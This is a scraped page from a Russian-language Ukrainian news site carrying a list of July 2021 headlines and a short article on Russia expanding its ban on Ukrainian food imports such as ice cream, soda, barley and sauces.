			</div>
					<div class="post_news">
			    <span id="post-4853951">
				    <span class="postDate">09:00</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news-auto/full/407-avtomexanik-prevratil-staryj-volkswagen-kombi-v-nastoyashhij-dom-na-kolesax-foto">Автомеханик превратил старый Volkswagen Kombi в настоящий дом на колесах. ФОТО</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853973">
				    <span class="postDate">08:52</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_sport/full/407-eto-byl-otlichnyj-turnir-dlya-sbornoj-ukrainy-gorzhus-nashej-stranoj-ilya-zabarnyj">Это был отличный турнир для сборной Украины, горжусь нашей страной, - Илья Забарный</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853969">
				    <span class="postDate">08:45</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_abroad/full/407-shest-chelovek-pogibli-na-gaiti-poterpel-krushenie-chastnyj-samolet-foto">Шесть человек погибли: на Гаити потерпел крушение частный самолет. ФОТО</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>03.07.2021 г.</span><br />			<div class="post_news">
			    <span id="post-4853900">
				    <span class="postDate">23:23</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_economy/full/307-ubytkov-na-652-mln-griven-inostrannoe-sudno-vybrosilo-vo-vnutrennie-morskie-vody-ukrainy-85-tonny-palmovogo-masla-foto">Убытков на 65,2 млн гривен: иностранное судно выбросило во внутренние морские воды Украины 8,5 тонны пальмового масла. ФОТО</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853785">
				    <span class="postDate">21:43</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_kiev/full/307-priroda-pobezhdaet-kak-v-chernobylskoj-zone-ischezayut-celye-sela-foto">Природа побеждает: как в Чернобыльской зоне исчезают целые села. ФОТО</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853876">
				    <span class="postDate">20:32</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_society/full/307-evro-2020-kak-zheny-i-podruzhki-futbolistov-sbornoj-ukrainy-budut-bolet-za-nashix-v-italii-foto">Евро-2020: Как жены и подружки футболистов сборной Украины будут болеть за наших в Италии (ФОТО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853935">
				    <span class="postDate">20:29</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news-auto/full/307-ogromnaya-ochered-dalnobojshhikov-skopilas-na-polsko-ukrainskoj-granice">Огромная очередь дальнобойщиков скопилась на польско-украинской границе</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853945">
				    <span class="postDate">20:03</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news-markets/full/307-axmetov-vklyuchil-shantazh-dtek-obvalila-ceny-na-elektroenergiyu-v-ukraine">Ахметов включил шантаж. ДТЭК обвалила цены на электроэнергию в Украине</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853941">
				    <span class="postDate">18:53</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/zdorove/full/307-ukraina-rassleduet-prichiny-smerti-muzhchiny-vskore-posle-privivki-ot-covid-19">Украина расследует причины смерти мужчины вскоре после прививки от COVID-19</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853939">
				    <span class="postDate">18:27</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_politics/full/307-lukashenko-obvinil-zapadnye-strany-v-ocherednoj-popytke-ego-sverzheniya">Лукашенко обвинил западные страны в очередной попытке его свержения</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853937">
				    <span class="postDate">18:04</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_abroad/full/307-rossijskie-voennye-samolety-otrabotali-bombardirovku-korablej-nato-v-xode-uchenij-v-chernom-more">Российские военные самолеты отработали бомбардировку кораблей НАТО в ходе учений в Черном море</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853890">
				    <span class="postDate">17:32</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_society/full/307-odin-chelovek-pogib-i-shest-postradali-v-dnepre-stolknulis-dve-inormarki-foto-video">Машину два раза подкинуло в воздухе: в Днепре столкнулись две иномарки. ФОТО. ВИДЕО</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853926">
				    <span class="postDate">17:23</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_abroad/full/307-otkrytie-pamyatnika-princesse-diane-pochemu-ne-bylo-kejt-middlton">Открытие памятника принцессе Диане: почему не было Кейт Миддлтон</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853915">
				    <span class="postDate">16:18</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_sport/full/307-match-ukraina-angliya-v-seti-poyavilis-kureznye-fotozhaby">Матч Украина-Англия: в сети появились курьезные фотожабы</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853901">
				    <span class="postDate">14:53</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_sport/full/307-evro-2020-ukrainskij-silach-novikov-ozhidaet-zaxvatyvayushhego-trillera-v-matche-ukraina-angliya">Евро-2020: Украинский силач Новиков ожидает захватывающего триллера в матче Украина - Англия</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853894">
				    <span class="postDate">14:01</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news-auto/full/307-za-paru-minut-vygorel-dotla-v-ssha-na-xodu-zagorelsya-elektrokar-tesla-model-s-plaid-foto">За пару минут выгорел дотла: в США на ходу загорелся электрокар Tesla Model S Plaid. ФОТО</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853889">
				    <span class="postDate">13:31</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_society/full/307-stata-izvestna-stoimost-razrabotki-ukrainskogo-beregovogo-raketnogo-kompleksa-neptun">Стала известна стоимость разработки украинского берегового ракетного комплекса "Нептун"</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853777">
				    <span class="postDate">12:37</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_incidents/full/207-v-ukrainu-vozvrashhaetsya-ad-sinoptiki-dali-letnij-prognoz">В Украину возвращается сильная жара: Синоптики дали летний прогноз</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853862">
				    <span class="postDate">11:53</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_sport/full/307-klichko-verit-v-pobedu-sbornoj-ukrainy-nad-angliej-v-chetvertfinalnom-poedinke-evro-2020">Кличко верит в победу сборной Украины над Англией в четвертьфинальном поединке Евро-2020</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853852">
				    <span class="postDate">10:53</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_kiev/full/307-ya-takix-zhlobov-eshhe-ne-videla-nardep-shevchenko-nakinulsya-na-sotrudnicu-apparata-vr-foto">Нардеп Шевченко стал "героем парковки" и снова попал в скандал. ФОТО</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853856">
				    <span class="postDate">10:51</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_society/full/307-idiotizm-prinuzhdenie-zhenshhin-voennosluzhashhix-marshirovat-na-kablukax-razgnevalo-ukraincev-the-guardian">«Идиотизм»: Принуждение женщин-военнослужащих маршировать на каблуках разгневало украинцев, - The Guardian</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853772">
				    <span class="postDate">10:50</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_society/full/207-evro-2020-posolstvo-britanii-pered-vazhnym-matchem-napomnilo-o-donecke-i-kryme">Евро 2020: Посольство Британии перед важным матчем напомнило о Донецке и Крыме</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853844">
				    <span class="postDate">10:07</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_abroad/full/307-kak-vyglyadit-samyj-bolshoj-xram-v-mire-foto">Как выглядит самый большой храм в мире. ФОТО</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853841">
				    <span class="postDate">09:43</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_abroad/full/307-poyavilos-video-goryashhej-pod-vodoj-nefti-v-meksikanskom-zalive-video">Появилось видео горящей под водой нефти в Мексиканском заливе (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853840">
				    <span class="postDate">09:29</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/zdorove/full/307-vrachi-zayavili-chto-otsutstvie-mindalin-vliyaet-na-techenie-covid-19">Врачи заявили, что отсутствие миндалин влияет на течение COVID-19</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853806">
				    <span class="postDate">08:45</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_society/full/307-v-ukraine-pandemiya-covid-19-idet-na-spad-detalnyj-prognoz-na-pervuyu-polovinu-iyulya">В Украине пандемия COVID-19 идет на спад: детальный прогноз на первую половину июля</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853793">
				    <span class="postDate">08:15</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news-auto/full/307-na-ulicax-kieva-byl-zamechen-redkij-jaguar-za-170-tysyach-evro-foto">На улицах Киева был замечен редкий Jaguar за 170 тысяч евро. ФОТО</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>02.07.2021 г.</span><br />			<div class="post_news">
			    <span id="post-4853822">
				    <span class="postDate">22:18</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_incidents/full/207-11-letnij-malchik-razbilsya-za-rulem-inomarki-kuda-ego-posadil-pyanyj-otec-foto-video">11-летний мальчик разбился за рулем иномарки, куда его посадил пьяный отец. ФОТО. ВИДЕО</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853820">
				    <span class="postDate">19:36</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_society/full/207-atlas-weekend-prosyat-otkazat-meladze-v-uchastii-v-festivale">Atlas Weekend просят отказать Меладзе в участии в фестивале</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853821">
				    <span class="postDate">18:46</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_society/full/207-lukashenko-zaxotel-polnostyu-perekryt-granicu-s-ukrainoj">Лукашенко захотел полностью перекрыть границу с Украиной</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853819">
				    <span class="postDate">18:31</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_economy/full/207-ukraincy-dostayut-svoi-sberezheniya-traty-rezko-vyrosli">Украинцы достают свои сбережения. Траты резко выросли</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853818">
				    <span class="postDate">18:21</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_society/full/207-ukrainskaya-oblast-iz-za-mutacii-delta-reshila-usilit-karantin">Украинская область из-за мутации Дельта решила усилить карантин</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853817">
				    <span class="postDate">17:41</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_economy/full/207-stalo-izvestno-kakie-produkty-podorozhayut-i-podesheveyut-v-iyule">Стало известно, какие продукты подорожают и подешевеют в июле</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853814">
				    <span class="postDate">17:37</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news-finance/full/207-denezhnye-perevody-v-ukrainu-rezko-vyrosli-nacbank">Денежные переводы в Украину  существенно выросли, - Нацбанк</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853811">
				    <span class="postDate">17:02</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_incidents/full/207-verxovnyj-sud-vynes-prigovor-pukachu-za-ubijstvo-gongadze">Верховный суд вынес приговор Пукачу за убийство Гонгадзе</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853781">
				    <span class="postDate">16:50</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_sport/full/207-byvshij-kapitan-dinamo-sdelal-prognoz-na-match-ukraina-angliya">Евро-2020: Бывший капитан "Динамо" сделал прогноз на матч Украина - Англия</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853810">
				    <span class="postDate">16:48</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_society/full/207-avstriya-i-niderlandy-otkrylis-dlya-ukraincev-no-est-usloviya">Австрия и Нидерланды открылись для украинцев. Но есть условия</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853792">
				    <span class="postDate">15:58</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_politics/full/207-korpus-morskoj-pexoty-ssha-perebrosil-svoi-protivotankovye-raketonoscy-v-ukrainu-foto">Корпус морской пехоты США перебросил свои противотанковые ракетоносцы  в Украину (ФОТО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853791">
				    <span class="postDate">15:53</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_society/full/207-v-minoborony-obyasnili-parad-na-kablukax-i-ukazali-palcem-na-drugie-strany">В Минобороны  объяснили "парад на каблуках" и указали пальцем на другие страны</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853789">
				    <span class="postDate">15:47</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news-finance/full/207-ukraina-poluchila-zajm-ot-vsemirnogo-banka-minfin">Украина получила займ от Всемирного банка, - Минфин</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853764">
				    <span class="postDate">15:33</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_abroad/full/207-v-kanade-v-xode-massovyx-protestov-povalili-pamyatniki-korolevam-viktorii-i-elizavete-ii-foto">В Канаде в ходе массовых протестов повалили памятники королевам Виктории и Елизавете ІІ. ФОТО</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853768">
				    <span class="postDate">13:46</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_politics/full/207-otkryli-rynok-zemli-i-uvelichili-nalogi-na-fermerov-v-pyat-raz-goncharenko-video">Открыли рынок земли и увеличили налоги на фермеров в пять раз, - Гончаренко (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853763">
				    <span class="postDate">13:32</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_politics/full/207-zakonoproekt-ob-oligarxax-eto-12-stranic-fantazijno-yuridicheskogo-teksta-zheleznyak-video">Законопроект об олигархах - это 12 страниц фантазийно-юридического текста, - Железняк (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853758">
				    <span class="postDate">13:20</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_abroad/full/207-turciya-pristupila-k-ispytaniyam-sobstvennoj-vakciny-ot-covid-19">Турция приступила к испытаниям собственной вакцины от COVID-19</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853748">
				    <span class="postDate">13:02</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_economy/full/207-v-byudzhet-s-yanvarya-po-maj-2021-goda-postupilo-766-ot-zaplanirovannyx-gosudarstvennyx-zajmov-minfin">В бюджет с января по май 2021 года поступило 76,6% от запланированных государственных займов, - Минфин</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853753">
				    <span class="postDate">12:59</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_society/full/207-sbu-blokirovala-deyatelnost-moshhnoj-kriptofermy-video">СБУ блокировала деятельность мощной криптофермы (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853749">
				    <span class="postDate">12:44</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_politics/full/207-paradnyj-marsh-na-kablukax-po-raskalennomu-placu-eto-pytka-gerashhenko-video">Парадный марш на каблуках по раскаленному плацу - это пытка, - Геращенко (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853744">
				    <span class="postDate">12:24</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_politics/full/207-zhenshhiny-vsu-marshiruyushhie-na-parade-v-kablukax-priznak-gendernogo-neravenstva-kravchuk-video">Женщины ВСУ, марширующие на параде в каблуках - признак гендерного неравенства, - Кравчук  (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853684">
				    <span class="postDate">12:22</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_incidents/full/207-v-kievskom-supermarkete-proizoshel-pozhar-video">В киевском супермаркете произошел пожар (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853705">
				    <span class="postDate">12:03</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_kiev/full/207-iz-kievskogo-obshhestvennogo-transporta-ubrali-konduktorov-kak-teper-oplatit-proezd">Из киевского общественного транспорта убрали кондукторов: как теперь оплатить проезд</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853739">
				    <span class="postDate">11:48</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_economy/full/207-globalnaya-ekonomika-prodolzhaet-vosstanavlivatsya-nbu">Глобальная экономика продолжает восстанавливаться, - НБУ</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853737">
				    <span class="postDate">11:30</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_economy/full/207-konfety-roshen-vo-vsex-gosuchrezhdeniyax-strany-poxozhe-na-monopoliyu-araxamiya-video">Конфеты «Рошен» во всех госучреждениях страны - похоже на монополию, - Арахамия (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853713">
				    <span class="postDate">11:15</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_politics/full/207-putin-obeshhanie-rossijskim-voennym-eshhe-bolshe-smertonosnogo-oruzhiya">Путин пообещал российским военным еще больше летального оружия - СМИ</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853733">
				    <span class="postDate">11:06</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_politics/full/207-legalizaciya-kanabisa-trebuet-shirokogo-obsuzhdeniya-v-obshhestve-kachura-video">Легализация канабиса требует широкого обсуждения в обществе, - Качура (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
			<div class="cls"></div>
	<a class="readMore" href="https://enovosty.com/news/">Все новости &raquo;</a>
</div>	
						<div class="links_bal">
					</div>
				
	 	<!--  News Join -->

			<!-- <div id="lastafisha" class="slide ssingle">
					</div> -->
		
	

    
	
		
		
    <!--  end News Join -->



	</div><div style="width:474px; border:none;" id="center"><div style="width:474px;overflow: visible;" class="wiget simple_category">
<style type="text/css" media="screen">
	@import url( https://enovosty.com/wp-content/themes/eizvestia/css/singlePage.min.css?v=1);
</style>
<style>#center .wiget.singlePost .plot{float:right;margin:5px 0 5px 10px;width:250px;} </style>


<div class="wiget simple singlePost" style="float: left; overflow: hidden; height:auto; border:none; padding:0; margin-bottom:10px;" >
        
	<div itemscope itemtype="https://schema.org/NewsArticle" class="post" style="margin:0; padding:0; " id="post-4854077">
		<meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://enovosty.com/news/news-markets/full/507-rossiya-zapretila-morozhenoe-gazirovku-i-yachmen-iz-ukrainy"/>
		<article style="font-size:12pt;">
			<!-- <div class="widget simple" id="readMoreInPost">-->
			<!--  <h2>Читайте также</h2> -->
			<!--    
			</div>-->
						<h1 itemprop="headline" id="postTitle">Россия запретила мороженое, газировку и ячмень из Украины</h1>
						<div class="breadcrumb">
				<a href="https://enovosty.com/">Главная</a> <span>&raquo;</span> <a href="https://enovosty.com/news/">Последние новости</a> <span>&raquo;</span> <a href="https://enovosty.com/news/news-markets">Новости рынков</a> <span>&raquo;</span> Россия запретила мороженое, газировку и ячмень из Украины			</div>
			<time datetime="2021-07-05T13:40:21+03:00">
			<span id="date">
				Новости рынков,  13:40:21 			</span>
			</time>
			<div class="border">&nbsp;</div>
			<table class="social">
				<tr>
					<td>
						<div class="addtoany_shortcode"><div class="a2a_kit a2a_kit_size_22 addtoany_list" data-a2a-url="https://enovosty.com/news/news-markets/full/507-rossiya-zapretila-morozhenoe-gazirovku-i-yachmen-iz-ukrainy" data-a2a-title="Россия запретила мороженое, газировку и ячмень из Украины"><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fenovosty.com%2Fnews%2Fnews-markets%2Ffull%2F507-rossiya-zapretila-morozhenoe-gazirovku-i-yachmen-iz-ukrainy&amp;linkname=%D0%A0%D0%BE%D1%81%D1%81%D0%B8%D1%8F%20%D0%B7%D0%B0%D0%BF%D1%80%D0%B5%D1%82%D0%B8%D0%BB%D0%B0%20%D0%BC%D0%BE%D1%80%D0%BE%D0%B6%D0%B5%D0%BD%D0%BE%D0%B5%2C%20%D0%B3%D0%B0%D0%B7%D0%B8%D1%80%D0%BE%D0%B2%D0%BA%D1%83%20%D0%B8%20%D1%8F%D1%87%D0%BC%D0%B5%D0%BD%D1%8C%20%D0%B8%D0%B7%20%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%8B" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fenovosty.com%2Fnews%2Fnews-markets%2Ffull%2F507-rossiya-zapretila-morozhenoe-gazirovku-i-yachmen-iz-ukrainy&amp;linkname=%D0%A0%D0%BE%D1%81%D1%81%D0%B8%D1%8F%20%D0%B7%D0%B0%D0%BF%D1%80%D0%B5%D1%82%D0%B8%D0%BB%D0%B0%20%D0%BC%D0%BE%D1%80%D0%BE%D0%B6%D0%B5%D0%BD%D0%BE%D0%B5%2C%20%D0%B3%D0%B0%D0%B7%D0%B8%D1%80%D0%BE%D0%B2%D0%BA%D1%83%20%D0%B8%20%D1%8F%D1%87%D0%BC%D0%B5%D0%BD%D1%8C%20%D0%B8%D0%B7%20%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%8B" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_telegram" href="https://www.addtoany.com/add_to/telegram?linkurl=https%3A%2F%2Fenovosty.com%2Fnews%2Fnews-markets%2Ffull%2F507-rossiya-zapretila-morozhenoe-gazirovku-i-yachmen-iz-ukrainy&amp;linkname=%D0%A0%D0%BE%D1%81%D1%81%D0%B8%D1%8F%20%D0%B7%D0%B0%D0%BF%D1%80%D0%B5%D1%82%D0%B8%D0%BB%D0%B0%20%D0%BC%D0%BE%D1%80%D0%BE%D0%B6%D0%B5%D0%BD%D0%BE%D0%B5%2C%20%D0%B3%D0%B0%D0%B7%D0%B8%D1%80%D0%BE%D0%B2%D0%BA%D1%83%20%D0%B8%20%D1%8F%D1%87%D0%BC%D0%B5%D0%BD%D1%8C%20%D0%B8%D0%B7%20%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%8B" title="Telegram" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Fenovosty.com%2Fnews%2Fnews-markets%2Ffull%2F507-rossiya-zapretila-morozhenoe-gazirovku-i-yachmen-iz-ukrainy&amp;linkname=%D0%A0%D0%BE%D1%81%D1%81%D0%B8%D1%8F%20%D0%B7%D0%B0%D0%BF%D1%80%D0%B5%D1%82%D0%B8%D0%BB%D0%B0%20%D0%BC%D0%BE%D1%80%D0%BE%D0%B6%D0%B5%D0%BD%D0%BE%D0%B5%2C%20%D0%B3%D0%B0%D0%B7%D0%B8%D1%80%D0%BE%D0%B2%D0%BA%D1%83%20%D0%B8%20%D1%8F%D1%87%D0%BC%D0%B5%D0%BD%D1%8C%20%D0%B8%D0%B7%20%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%8B" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Fenovosty.com%2Fnews%2Fnews-markets%2Ffull%2F507-rossiya-zapretila-morozhenoe-gazirovku-i-yachmen-iz-ukrainy&amp;linkname=%D0%A0%D0%BE%D1%81%D1%81%D0%B8%D1%8F%20%D0%B7%D0%B0%D0%BF%D1%80%D0%B5%D1%82%D0%B8%D0%BB%D0%B0%20%D0%BC%D0%BE%D1%80%D0%BE%D0%B6%D0%B5%D0%BD%D0%BE%D0%B5%2C%20%D0%B3%D0%B0%D0%B7%D0%B8%D1%80%D0%BE%D0%B2%D0%BA%D1%83%20%D0%B8%20%D1%8F%D1%87%D0%BC%D0%B5%D0%BD%D1%8C%20%D0%B8%D0%B7%20%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%8B" title="Copy Link" rel="nofollow noopener" target="_blank"></a></div></div>					</td>
				</tr>			
			</table>
			<div class="printmail">
				 <a href="https://enovosty.com/print?printajax=4854077" style="padding-right:3px;">
					<img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать">
				</a>
				 <a href="#" id="mailto">
					<img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту">
				</a>
				<div class="mailwin" style="display:none;">
					<span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span>
					<input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button>
				</div>
				<p class="al_loadingImage" style="top:4%;">&nbsp;</p>
			</div>
			<div class="border">&nbsp;</div>
												
			 <div class="single_main_image">
					 
						<div data-hyb-ssp-in-image-overlay="5ef49f174d506eacc0504d73">
						<img width="460" height="279" src="https://enovosty.com/wp-content/uploads/2021/07/morogenoe-460x279.jpg" class="attachment-news-image size-news-image wp-post-image" alt="" loading="lazy" srcset="https://enovosty.com/wp-content/uploads/2021/07/morogenoe-e1625477915498.jpg 460w, https://enovosty.com/wp-content/uploads/2021/07/morogenoe-300x182.jpg 300w, https://enovosty.com/wp-content/uploads/2021/07/morogenoe-112x68.jpg 112w" sizes="(max-width: 460px) 100vw, 460px" />						</div>
						
					</div> <p><b>В России решили расширить список запрещенных продуктов из Украины </b></p><p>Российское правительство расширило  &#171;черный&#187; список товаров из Украины. Наша страна больше не может торговать мороженым, газировкой с сахаром и рядом других продуктов. Эти, так называемые, специальные экономические меры  в соседней стране связывают с &#171;недружественными мерами Украины&#187;. Об этом сообщают <a href="https://enovosty.com/news">Экономические Новости</a> со ссылкой на сайт <a rel="nofollow" href="https://ubr.ua/market/trade/rossija-zapretila-vvoz-rjada-ukrainskikh-produktov-spisok-4004661">УБР</a>. </p>
<p>Расширенный список россиян пополнился пищевым льдом, минеральной и газированной водой  с добавками сахара, другими подслащивающими или вкусо-ароматическими веществами, готовыми супами, бульонами и заготовками для их готовки.</p>
<p>Также, под запретом в Российской Федерации оказались пальмовое масло и eго фракции, украинский ячмeнь, и , готовые или консeвированные мясные продукты, субпродукты из мяса, готовые или консервированные ракообразные. Кроме того, из Украины запрещено ввозить  необезжиренную какао-пасту, макаронные изделия, попкорн, продукты типа мюсли, томатный кетчуп и другие томатные соусы, майонез, продукты для приготовления соусов. </p>
